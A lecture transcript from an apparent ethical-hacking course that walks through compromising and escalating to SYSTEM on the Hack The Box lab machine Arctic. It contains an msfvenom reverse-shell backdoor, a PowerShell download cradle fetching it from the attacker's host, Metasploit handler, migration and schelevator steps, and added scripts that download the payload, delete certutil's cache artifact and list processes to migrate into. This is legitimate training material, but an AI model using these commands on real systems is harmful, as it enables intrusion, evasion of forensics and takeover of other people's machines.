In this course, we explore pentesting and privilege escalation as we solve a Windows virtual machine called Arctic.
Hi. Within this lecture, we're going to try to escalate our privileges, and to do that I'm going to show you a new technique. If you come over here with a shell, you can try to upgrade that shell into a Meterpreter shell. As you know, we tried to get a Meterpreter shell earlier and haven't found a way yet. But now that we are inside the network and have hacked into the machine, we can create a new payload, upload it to the machine ourselves, and get a Meterpreter session back. By that I just mean a regular backdoor.exe, okay? So, how do we do it? We can create it easily with msfvenom. I'm going to run msfvenom with a Meterpreter payload, windows/meterpreter/reverse_tcp as usual, and give the LHOST and LPORT as usual. For the LPORT I'm going to choose something other than 4444, because we are already using that port for our existing shell; I'll go with 1234. The format will be exe, and I'm going to save it under /var/www/html/, which is my web server's root, and call it mybackdoor.exe. This is the same kind of backdoor we built in the complete Ethical Hacking course, if you have taken that one from us. And that's it; that's how we create the backdoor. Rather than sending it to a victim, we're going to upload it ourselves. To do that we can use certutil, which we have seen before. But in case certutil doesn't run or is blocked, I'm also going to show you an alternative way to do it, with PowerShell. It's a slightly long command that you need to memorize, which is a little annoying, but it will be very helpful if you cannot download a file with certutil.
So, you're going to have to take a note of this one; I'm reading it from my notes in order to type it here. This is PowerShell. PowerShell is the shell we use on the Windows operating system. It gives us a much richer command set than cmd.exe for managing Windows, but note that it runs with the privileges of the account that launched it; it does not make our commands more privileged by itself. The syntax goes like this. I'm going to type "(New-Object System.Net.WebClient)". This creates a WebClient object, which is what .NET uses to make HTTP requests, and that is exactly what we are trying to do. On that object we call the .DownloadFile method. After that, you specify the URL of the file you want to download, in single quotation marks; I'm writing the URL of mybackdoor.exe on my web server, and of course you have to use your own file name and your own IP address. The second argument, also in single quotes, is the name to save the file as. I'm calling it mybackdoor.exe one more time, then I close the single quotation mark, close the parenthesis and close the double quotation mark that we opened before. So, typed as one line, the command is powershell "(New-Object System.Net.WebClient).DownloadFile('http://<your IP>/mybackdoor.exe','mybackdoor.exe')", and the syntax has to be exactly like this, okay? We're creating a new WebClient and using its DownloadFile method to request mybackdoor.exe and save it. If I run this, it downloads the file and saves it. By the way, if it doesn't work here, change into the temp folder and try there: the file is written relative to the shell's current directory, and you need write access to it. As you can see, I believe it's working, or at least trying to work; it's downloading the exe. Let me see whether it finishes.
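The download step described above, written out as an added example (this is not code from the lecture). It tries certutil first and falls back to the WebClient cradle when certutil is missing or blocked, resolves the output path against PowerShell's current location (the .NET WebClient otherwise writes relative to the process working directory, which is the usual reason the one-liner "doesn't work" in a weird directory), and prints the file's SHA-256 so you can compare it with the copy on your web server. The attacker IP 10.10.14.19 and the file name mybackdoor.exe are taken from the lecture; everything else is assumed.

```powershell
# Added example, not from the lecture. Uses only .NET 2.0-era APIs so it also runs
# on older PowerShell versions. Assumes the attacker's web server is 10.10.14.19.

function Get-RemoteFile {
    param(
        [Parameter(Mandatory=$true)][string]$Url,
        [Parameter(Mandatory=$true)][string]$OutFile
    )
    # WebClient resolves relative paths against the process cwd, not PowerShell's
    # current location, so anchor the path ourselves before doing anything.
    if (-not [System.IO.Path]::IsPathRooted($OutFile)) {
        $OutFile = Join-Path (Get-Location).ProviderPath $OutFile
    }
    if (Test-Path $OutFile) { Remove-Item $OutFile -Force }

    # 1) certutil, the method shown earlier in the course
    $certutil = Join-Path $env:SystemRoot 'System32\certutil.exe'
    if (Test-Path $certutil) {
        & $certutil -urlcache -split -f $Url $OutFile 2>&1 | Out-Null
        if ((Test-Path $OutFile) -and ((Get-Item $OutFile).Length -gt 0)) {
            # certutil keeps a copy of every fetched URL under the user's
            # CryptnetUrlCache; remove that artifact once we have the file.
            & $certutil -urlcache -f $Url delete 2>&1 | Out-Null
            return (Get-Item $OutFile)
        }
    }

    # 2) fallback: the WebClient cradle from the lecture
    $wc = New-Object System.Net.WebClient
    $wc.DownloadFile($Url, $OutFile)
    return (Get-Item $OutFile)
}

function Get-Sha256Hex {
    # Get-FileHash only exists on newer PowerShell, so hash with the .NET class.
    param([Parameter(Mandatory=$true)][string]$Path)
    $sha    = [System.Security.Cryptography.SHA256]::Create()
    $stream = [System.IO.File]::OpenRead($Path)
    try   { $hash = $sha.ComputeHash($stream) }
    finally { $stream.Close() }
    return ([System.BitConverter]::ToString($hash)).Replace('-', '').ToLower()
}

# Usage: pull the payload into %TEMP% and report size and hash.
$file = Get-RemoteFile -Url 'http://10.10.14.19/mybackdoor.exe' `
                       -OutFile (Join-Path $env:TEMP 'mybackdoor.exe')
"{0} bytes, sha256 {1}" -f $file.Length, (Get-Sha256Hex -Path $file.FullName)
```

Compare the printed hash with sha256sum /var/www/html/mybackdoor.exe on the attacking machine before running the file; a truncated download (the box is slow) is the usual reason the callback never arrives.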
And again, sometimes certutil won't let you do that, and this PowerShell command will, so it's good to know both of them. Take note of this command and of the output it gives, just like the certutil -urlcache usage we have seen before. Now, here you go, I believe it's done; it took a while. I'm going to run dir, and here you go, we see mybackdoor.exe. After the download completes you may have to hit Enter to get the prompt back. Now I'm going to run msfconsole, because we're going to create another listener, this time with a Meterpreter payload, so that we get a Meterpreter session back. With a Meterpreter session we can easily run the post-exploitation modules. That's why I'm going to this trouble: it makes our job very easy afterwards. In msfconsole I use exploit/multi/handler and set the payload to windows/meterpreter/reverse_tcp. If you say show options, you'll see that you have to set lhost, and of course we also have to change lport to 1234 so it matches the payload we generated. I'm going to run exploit -j -z to start it in the background. Now I run mybackdoor.exe from the Windows shell, and here you go, we have the session back. I'm going to hit Enter and interact with that session with sessions -i 1 (the command is sessions, plural). Now if I say getuid, we are ARCTIC\tolis one more time, but this time inside a Meterpreter session. If I run sysinfo, you'll see the current connection to the ARCTIC Windows machine. Very good. Again, we did the same thing: we didn't escalate our privileges, but we upgraded our shell, so we are in a Windows Meterpreter session now. If you run shell, we get back the cmd shell we were in before, but from Meterpreter I can run post/multi/recon/local_exploit_suggester (note the spelling, exploit_suggester). Great.
Now, if I run this, it automatically collects the data about the target, checks it against Metasploit's local exploits, and displays the results. It says it will try 34 exploit checks. Great. We see some of the things we have seen before, like schelevator, and ms16_075_reflection is here as well. This time I'm going to go for schelevator, because as I said, it's one of the most popular ones and we haven't seen it yet. If you go to google.com and search for schelevator, you'll find the Windows Task Scheduler XML Privilege Escalation module (MS10-092) on rapid7's site. Of course you can look at the other ones here as well; you can read the description and the usage. It seems we can run this against both architectures, 32-bit and 64-bit. The suggester said it was collecting local exploits for a 32-bit session, but our target architecture is 64-bit, so I don't know whether that's going to cause any problems, but we can easily try, since the module is already there. All you have to do is copy the module name and use it, but at the msfconsole prompt, not inside the Meterpreter session, so first background the session and then run use with that module path. When you run show options, you'll see that you have to set the session; ours is 1. I'm going to set session 1, set lhost to 10.10.14.19, and for lport choose something we have never used before, 5555. Here you go, I'm going to run exploit and see. It says there's a problem: try using an x64 Meterpreter. It's very good that we get this error back, because it tells us exactly what the module expects. On this 64-bit target the module must run from a 64-bit Meterpreter, so we'll have to switch into one.
We haven't seen that before, so this is a great opportunity for us. I'm going to go into session 1 and run sysinfo rather than getuid. It shows that the OS architecture is x64 but the Meterpreter is x86: our session lives in a 32-bit process, and that's what's causing the problem. What we can do is migrate our Meterpreter into a 64-bit process. To do that, list the running processes with the ps command. ps shows every process on the Windows machine with its PID, architecture and owner, and as you can see our cmd.exe is x86, which is 32-bit. We need to migrate into something 64-bit, for example jrun.exe, which is the ColdFusion server process. So all you have to do is run migrate 1184, where 1184 is its PID. If that doesn't work, try another x64 process; you can only migrate into a process you have the rights to open, which as tolis means processes running as your own user. I believe this worked very well. If you have taken the complete Ethical Hacking course, you know what migrating means. As you can see, sysinfo now shows the Meterpreter as x64 as well. We generally migrate to keep our session alive if the original process dies, but this time we did it to get into a 64-bit session, which is usually more stable anyway. Now I'm going to come over here and say show options for schelevator: the session is still 1, and lhost and lport are still fine. I'm going to run exploit. This time, as you can see, it's working; it didn't complain about 64-bit. Now I say getuid, and here you go: schelevator runs our payload through a scheduled task as SYSTEM, so we are effectively root, the administrator of the box. We managed to escalate our privileges. If I run pwd I'm in system32. I go up one level, run pwd, and I'm in C:\. I go into Users and run ls.
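The detour above (32-bit session on a 64-bit box, then migrate) can be avoided by checking the shell's bitness before you generate the payload: if the shell is a 32-bit process under WOW64, you can either build the payload with windows/x64/meterpreter/reverse_tcp or start a native 64-bit PowerShell through the sysnative alias and run the payload from there. The following PowerShell is an added example, not code from the lecture. Get-ShellBitness reports whether the current shell is 32-bit on a 64-bit Windows, and Get-MigrationCandidates lists the 64-bit processes the current user can open, which is roughly the set Meterpreter's migrate command will succeed on. The function names are my own; it relies on the documented IsWow64Process API and the PROCESSOR_ARCHITEW6432 environment variable, and assumes it runs on the target in a PowerShell that allows Add-Type.

```powershell
# Added example, not from the lecture. Run on the target from the shell you already have.
# Uses CLR 2.0-era APIs only, so it works on older PowerShell versions too.

# IsWow64Process sets its out parameter to TRUE for a 32-bit process running under WOW64.
$signature = @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool IsWow64Process(System.IntPtr hProcess, out bool wow64Process);
'@
$Kernel32 = Add-Type -MemberDefinition $signature -Name 'NativeMethods' -Namespace 'Win32' -PassThru

function Get-ShellBitness {
    # Pointer size tells us the bitness of this process; PROCESSOR_ARCHITEW6432 is only
    # set inside a WOW64 (32-bit on 64-bit Windows) process.
    $procIs64 = ([IntPtr]::Size -eq 8)
    $wow64    = (-not $procIs64) -and (-not [string]::IsNullOrEmpty($env:PROCESSOR_ARCHITEW6432))
    New-Object PSObject -Property @{
        ShellIs64Bit      = $procIs64
        OsIs64Bit         = ($procIs64 -or $wow64)
        RunningUnderWow64 = $wow64
        # From a 32-bit process, sysnative is the un-redirected 64-bit System32.
        Native64BitPowerShell = Join-Path $env:SystemRoot 'sysnative\WindowsPowerShell\v1.0\powershell.exe'
        SuggestedPayload  = $(if ($procIs64 -or $wow64) { 'windows/x64/meterpreter/reverse_tcp' }
                              else { 'windows/meterpreter/reverse_tcp' })
    }
}

function Get-MigrationCandidates {
    # 64-bit processes we can open with full access: plausible targets for 'migrate'.
    $shell = Get-ShellBitness
    if (-not $shell.OsIs64Bit) {
        Write-Warning '32-bit Windows: every process is 32-bit, nothing to migrate into.'
        return
    }
    foreach ($p in Get-Process) {
        $isWow64 = $false
        try {
            # .Handle opens the process with PROCESS_ALL_ACCESS; if that fails we could not
            # inject into it either, so skip it (other users' and protected processes).
            $handle = $p.Handle
            [void]$Kernel32::IsWow64Process($handle, [ref]$isWow64)
        } catch { continue }
        if (-not $isWow64) {
            New-Object PSObject -Property @{ Pid = $p.Id; Name = $p.ProcessName; Arch = 'x64' }
        }
    }
}

# Usage
Get-ShellBitness | Format-List
Get-MigrationCandidates | Sort-Object Name | Format-Table Pid, Name, Arch -AutoSize
```

If RunningUnderWow64 is true, the cleanest fix is to regenerate the payload with the x64 Meterpreter, or launch it from the sysnative PowerShell path shown; migrating into the ColdFusion process as the lecture does works too, but if that process crashes you lose the foothold that got you in.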
I see the Administrator folder, so I go into Administrator, and if I run ls I can see everything in it. I'm going into Desktop, because that's where the root flag lives on Hack The Box machines, okay? I cat the file out, and here you go, we've got the root flag. So this is how you hack Arctic. Again, it's not a very pleasant CTF because you have to wait about 10 seconds before anything happens, but it teaches us a lot: we hadn't seen schelevator or process migration before, and there are a lot of other things in this section that we haven't covered before, which is why we chose it. So far so good. I hope you enjoyed this section. See you in the next one for the closing.
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.